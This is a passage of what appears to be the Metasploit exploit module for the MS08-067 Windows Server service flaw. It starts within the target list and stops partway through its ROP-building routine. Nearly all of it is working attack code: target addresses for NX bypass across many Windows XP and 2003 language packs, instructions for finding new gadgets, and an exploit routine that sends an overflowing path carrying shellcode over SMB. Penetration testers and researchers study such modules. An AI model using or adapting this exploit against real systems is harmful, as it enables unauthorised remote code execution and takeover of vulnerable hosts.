              ['Windows XP SP2 Russian (NX)',
               {
                 'Ret'       => 0x6fe1f727,
                 'DisableNX' => 0x6fe216e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Swedish (NX)',
               {
                 'Ret'       => 0x597af727,
                 'DisableNX' => 0x597b16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Turkish (NX)',
               {
                 'Ret'       => 0x5a78f727,
                 'DisableNX' => 0x5a7916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Arabic (NX)',
               {
                 'Ret'       => 0x6fd8f807,
                 'DisableNX' => 0x6fd917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
               {
                 'Ret'       => 0x5860f807,
                 'DisableNX' => 0x586117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Chinese - Simplified (NX)',
               {
                 'Ret'       => 0x58fbf807,
                 'DisableNX' => 0x58fc17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Chinese - Traditional (NX)',
               {
                 'Ret'       => 0x5860f807,
                 'DisableNX' => 0x586117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Czech (NX)',
               {
                 'Ret'       => 0x6fe1f807,
                 'DisableNX' => 0x6fe217c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Danish (NX)',
               {
                 'Ret'       => 0x5978f807,
                 'DisableNX' => 0x597917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 German (NX)',
               {
                 'Ret'       => 0x6fd9f807,
                 'DisableNX' => 0x6fda17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Greek (NX)',
               {
                 'Ret'       => 0x592af807,
                 'DisableNX' => 0x592b17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Spanish (NX)',
               {
                 'Ret'       => 0x6fdbf807,
                 'DisableNX' => 0x6fdc17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Finnish (NX)',
               {
                 'Ret'       => 0x597df807,
                 'DisableNX' => 0x597e17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 French (NX)',
               {
                 'Ret'       => 0x595bf807,
                 'DisableNX' => 0x595c17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Hebrew (NX)',
               {
                 'Ret'       => 0x5940f807,
                 'DisableNX' => 0x594117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Hungarian (NX)',
               {
                 'Ret'       => 0x5970f807,
                 'DisableNX' => 0x597117c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Italian (NX)',
               {
                 'Ret'       => 0x596bf807,
                 'DisableNX' => 0x596c17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Japanese (NX)',
               {
                 'Ret'       => 0x567fd4d2,
                 'DisableNX' => 0x568017c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Korean (NX)',
               {
                 'Ret'       => 0x6fd6f807,
                 'DisableNX' => 0x6fd717c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Dutch (NX)',
               {
                 'Ret'       => 0x596cf807,
                 'DisableNX' => 0x596d17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Norwegian (NX)',
               {
                 'Ret'       => 0x597cf807,
                 'DisableNX' => 0x597d17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Polish (NX)',
               {
                 'Ret'       => 0x5941f807,
                 'DisableNX' => 0x594217c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Portuguese - Brazilian (NX)',
               {
                 'Ret'       => 0x596ff807,
                 'DisableNX' => 0x597017c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Portuguese (NX)',
               {
                 'Ret'       => 0x596bf807,
                 'DisableNX' => 0x596c17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Russian (NX)',
               {
                 'Ret'       => 0x6fe1f807,
                 'DisableNX' => 0x6fe217c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Swedish (NX)',
               {
                 'Ret'       => 0x597af807,
                 'DisableNX' => 0x597b17c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 Turkish (NX)',
               {
                 'Ret'       => 0x5a78f807,
                 'DisableNX' => 0x5a7917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              #
              # Windows 2003 Targets
              #
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP1 English (NO NX)',
               {
                 'Ret'       => 0x71bf21a2,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP1
              ['Windows 2003 SP1 English (NX)',
               {
                 'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
                 'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP1 Japanese (NO NX)',
               {
                 'Ret'       => 0x71a921a2,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP1 Spanish (NO NX)',
               {
                 'Ret'       => 0x71ac21a2,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP1
              ['Windows 2003 SP1 Spanish (NX)',
               {
                 'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
                 'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
              # Standard return-to-ESI without NX bypass
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP1 French (NO NX)',
                {
                  'Ret'       => 0x71ac1c40 ,
                  'Scratch'   => 0x00020408
                }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP1
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP1 French (NX)',
                {
                  'RetDec'    => 0x7CA2568C,  # dec ESI, ret @SHELL32.DLL
                  'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
                  'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408
                }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP2 English (NO NX)',
               {
                 'Ret'       => 0x71bf3969,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              ['Windows 2003 SP2 English (NX)',
               {
                 'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
                 'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP2 German (NO NX)',
               {
                 'Ret'       => 0x71a03969,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              ['Windows 2003 SP2 German (NX)',
               {
                 'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
                 'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Portuguese (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
              [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP2 Spanish (NO NX)',
               {
                 'Ret'       => 0x71ac3969,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              ['Windows 2003 SP2 Spanish (NX)',
               {
                 'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
                 'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Standard return-to-ESI without NX bypass
              # Provided by Masashi Fujiwara
              ['Windows 2003 SP2 Japanese (NO NX)',
               {
                 'Ret'       => 0x71a91ed2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Standard return-to-ESI without NX bypass
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP2 French (NO NX)',
                {
                  'Ret'       => 0x71AC2069,
                  'Scratch'   => 0x00020408
                }
              ], # CALL ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP2 French (NX)',
                {
                  'RetDec'    => 0x7C98BEB8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Chinese - Simplified (NX)',
                {
                  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Czech (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Dutch (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Hungarian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Italian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Russian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Swedish (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Turkish (NX)',
                {
                  'RetDec'    => 0x7c96beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c96a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c93f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              #
              # Missing Targets
              # Key:   T=TODO   ?=UNKNOWN   U=UNRELIABLE
              #
              # [?] Windows Vista SP0 - Not tested yet
              # [?] Windows Vista SP1 - Not tested yet
              #
            ],
    
          'DisclosureDate' => '2008-10-28'))
    
        register_options(
          [
            OptString.new('SMBPIPE', [true,  'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
          ])
    
        deregister_options('SMB::ProtocolVersion')
      end
    
      #
      #
      #   *** WINDOWS XP SP2/SP3 TARGETS ***
      #
      #
      #   This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
      #   for the process and then returns back to a call ESI instruction. These addresses are different
      #   between operating systems, service packs, and language packs, but the steps below can be used to
      #   add new targets.
      #
      #
      #   If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
      #   DisableNX elements of the target hash.
      #
      #   If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
      #   First obtain the value for the Ret element of the hash with the following command:
      #
      #   $ msfpescan -j esi acgenral.dll
      #
      #   Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
      #
      #   Next, find the location of the function we use to disable NX. Use the following command:
      #
      #   $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
      #
      #   This address should be placed into the DisableNX element of the target hash.
      #
      #   The Scratch element of 0x00020408 should work on all versions of Windows
      #
      #   The actual function we use to disable NX looks like this:
      #
      #     push    4
      #     lea     eax, [ebp+arg_0]
      #     push    eax
      #     push    22h
      #     push    0FFFFFFFFh
      #     mov     [ebp+arg_0], 2
      #     call    ds:__imp__NtSetInformationProcess@16
      #
      #
      #   *** WINDOWS XP NON-NX TARGETS ***
      #
      #
      #   Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
      #   jump, and finally the shellcode.
      #
      #
      #   *** WINDOWS 2003 SP2 TARGETS ***
      #
      #
      #   There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
      #   both of these are inside NTDLL.DLL and use a return method that is not directly compatible
      #   with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
      #   that eventually leads to the NX bypass function.
      #
      #
      #   *** WINDOWS 2000 TARGETS ***
      #
      #
      #   No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
      #   jump, and finally the shellcode.
      #
      #
      #   *** WINDOWS VISTA TARGETS ***
      #
      #   Currently untested, will involve ASLR and NX, should be fun.
      #
      #
      #   *** NetprPathCanonicalize IDL ***
      #
      #
      #   NET_API_STATUS NetprPathCanonicalize(
      #   [in, string, unique] SRVSVC_HANDLE ServerName,
      #   [in, string] WCHAR* PathName,
      #   [out, size_is(OutbufLen)] unsigned char* Outbuf,
      #   [in, range(0,64000)] DWORD OutbufLen,
      #   [in, string] WCHAR* Prefix,
      #   [in, out] DWORD* PathType,
      #   [in] DWORD Flags
      #   );
      #
    
      def exploit
        begin
          connect(versions: [1])
          smb_login
        rescue Rex::Proto::SMB::Exceptions::LoginError => e
          if e.message =~ /Connection reset/
            print_error('Connection reset during login')
            print_error('This most likely means a previous exploit attempt caused the service to crash')
            return
          else
            raise e
          end
        end
    
        # Use a copy of the target
        mytarget = target
    
        if target['auto']
    
          mytarget = nil
    
          print_status('Automatically detecting the target...')
          fprint = smb_fingerprint
    
          print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
    
          # Bail early on unknown OS
          if (fprint['os'] == 'Unknown')
            fail_with(Failure::NoTarget, 'No matching target')
          end
    
          # Windows 2000 is mostly universal
          if (fprint['os'] == 'Windows 2000')
            mytarget = targets[1]
          end
    
          # Windows XP SP0/SP1 is mostly universal
          if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'
            mytarget = targets[2]
          end
    
          # Windows 2003 SP0 is mostly universal
          if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?
            mytarget = targets[3]
          end
    
          # Windows 2003 R2 is treated the same as 2003
          if (fprint['os'] == 'Windows 2003 R2')
            fprint['os'] = 'Windows 2003'
          end
    
          # Service Pack match must be exact
          if (not mytarget) and fprint['sp'].index('+')
            print_error('Could not determine the exact service pack')
            print_error("Auto-targeting failed, use 'show targets' to manually select one")
            disconnect
            return
          end
    
          # Language Pack match must be exact or we default to English
          if (not mytarget) and fprint['lang'] == 'Unknown'
            print_status('We could not detect the language pack, defaulting to English')
            fprint['lang'] = 'English'
          end
    
          # Normalize the service pack string
          fprint['sp'].gsub!(/Service Pack\s+/, 'SP')
    
          unless mytarget
            targets.each do |t|
              # Prefer AlwaysOn NX over NX, and NX over non-NX
              if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/
                mytarget = t
                break
              end
              if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/
                mytarget = t
                break
              end
            end
          end
    
          unless mytarget
            fail_with(Failure::NoTarget, 'No matching target')
          end
    
          print_status("Selected Target: #{mytarget.name}")
        end
    
        #
        # Build the malicious path name
        #
    
        padder = [*('A'..'Z')]
        pad = 'A'
        while pad.length < 7
          c = padder[rand(padder.length)]
          next if pad.index(c)
          pad += c
        end
    
        prefix = '\\'
        path   = ''
        server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
    
        #
        # Windows 2003 SP2 (NX) targets
        #
        if mytarget['RetDec']
    
          jumper = Rex::Text.rand_text_alpha(70).upcase
          jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room
    
          jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space
          jumper[ 8, 4] = [mytarget['RetDec']].pack('V')
          jumper[ 12, 4] = [mytarget['RetDec']].pack('V')
          jumper[ 16, 4] = [mytarget['RetDec']].pack('V')
    
          jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP
          jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')
    
          jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')
          jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')
          jumper[ 64, 2] = "\xeb\x02"                    # our jump
          jumper[ 68, 2] = "\xeb\x62"                    # original
    
          path =
            Rex::Text.to_unicode('\\') +
    
            # This buffer is removed from the front
            Rex::Text.rand_text_alpha(100) +
    
            # Shellcode
            payload.encoded +
    
            # Relative path to trigger the bug
            Rex::Text.to_unicode('\\..\\..\\') +
    
            # Extra padding
            Rex::Text.to_unicode(pad) +
    
            # Writable memory location (static)
            [mytarget['Scratch']].pack('V') + # EBP
    
            # Return to code which disables NX (or just the return)
            [mytarget['RetDec']].pack('V') +
    
            # Padding with embedded jump
            jumper +
    
            # NULL termination
            "\x00" * 2
    
        #
        # Windows XP SP2/SP3 ROP Stager targets
        #
        elsif mytarget['UseROP']
    
          rop = generate_rop(mytarget['UseROP'])
    
          path =
            Rex::Text.to_unicode('\\') +
    
            # This buffer is removed from the front
            Rex::Text.rand_text_alpha(100) +
    
            # Shellcode
            payload.encoded +
    
            # Relative path to trigger the bug
            Rex::Text.to_unicode('\\..\\..\\') +
    
            # Extra padding
            Rex::Text.to_unicode(pad) +
    
            # ROP Stager
            rop +
    
            # Padding (skipped)
            Rex::Text.rand_text_alpha(2) +
    
            # NULL termination
            "\x00" * 2
    
        #
        # Windows 2000, XP (NX), and 2003 (NO NX) targets
        #
        else
    
          jumper = Rex::Text.rand_text_alpha(70).upcase
          jumper[ 4, 4] = [mytarget.ret].pack('V')
          jumper[50, 8] = make_nops(8)
          jumper[58, 2] = "\xeb\x62"
    
          path =
            Rex::Text.to_unicode('\\') +
    
            # This buffer is removed from the front
            Rex::Text.rand_text_alpha(100) +
    
            # Shellcode
            payload.encoded +
    
            # Relative path to trigger the bug
            Rex::Text.to_unicode('\\..\\..\\') +
    
            # Extra padding
            Rex::Text.to_unicode(pad) +
    
            # Writable memory location (static)
            [mytarget['Scratch']].pack('V') + # EBP
    
            # Return to code which disables NX (or just the return)
            [mytarget['DisableNX'] || mytarget.ret].pack('V') +
    
            # Padding with embedded jump
            jumper +
    
            # NULL termination
            "\x00" * 2
    
        end
    
        handle = dcerpc_handle(
          '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
          'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
        )
    
        dcerpc_bind(handle)
    
        stub =
          NDR.uwstring(server) +
          NDR.UnicodeConformantVaryingStringPreBuilt(path) +
          NDR.long(rand(1024)) +
          NDR.wstring(prefix) +
          NDR.long(4097) +
          NDR.long(0)
    
        # NOTE: we don't bother waiting for a response here...
        print_status('Attempting to trigger the vulnerability...')
        dcerpc.call(0x1f, stub, false)
    
        # Cleanup
        handler
        disconnect
      end
    
      def check
        begin
          connect(versions: [1])
          smb_login
        rescue Rex::ConnectionError => e
          vprint_error("Connection failed: #{e.class}: #{e}")
          return Msf::Exploit::CheckCode::Unknown
        rescue Rex::Proto::SMB::Exceptions::LoginError => e
          if e.message =~ /Connection reset/
            vprint_error('Connection reset during login')
            vprint_error('This most likely means a previous exploit attempt caused the service to crash')
            return Msf::Exploit::CheckCode::Unknown
          else
            raise e
          end
        end
    
        #
        # Build the malicious path name
        # 5b878ae7 "db @eax;g"
        prefix = '\\'
        path =
          "\x00\\\x00/" * 0x10 +
          Rex::Text.to_unicode('\\') +
          Rex::Text.to_unicode('R7') +
          Rex::Text.to_unicode('\\..\\..\\') +
          Rex::Text.to_unicode('R7') +
          "\x00" * 2
    
        server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
    
        handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
                               'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
        )
    
        begin
          # Samba doesn't have this handle and returns an ErrorCode
          dcerpc_bind(handle)
        rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
          vprint_error("SMB error: #{e.message}")
          return Msf::Exploit::CheckCode::Safe
        end
    
        vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
    
        stub =
          NDR.uwstring(server) +
          NDR.UnicodeConformantVaryingStringPreBuilt(path) +
          NDR.long(8) +
          NDR.wstring(prefix) +
          NDR.long(4097) +
          NDR.long(0)
    
        resp = dcerpc.call(0x1f, stub)
        error = resp[4, 4].unpack('V')[0]
    
        # Cleanup
        simple.client.close
        simple.client.tree_disconnect
        disconnect
    
        if (error == 0x0052005c) # \R :)
          return Msf::Exploit::CheckCode::Vulnerable
        else
          vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
          return Msf::Exploit::CheckCode::Safe
        end
      end
    
      def generate_rop(version)
        free_byte = "\x90"
        # free_byte = "\xcc"
    
        # create a few small gadgets
        #  <free byte>; pop edx; pop ecx; ret
        gadget1 = free_byte + "\x5a\x59\xc3"
        #  mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
        gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
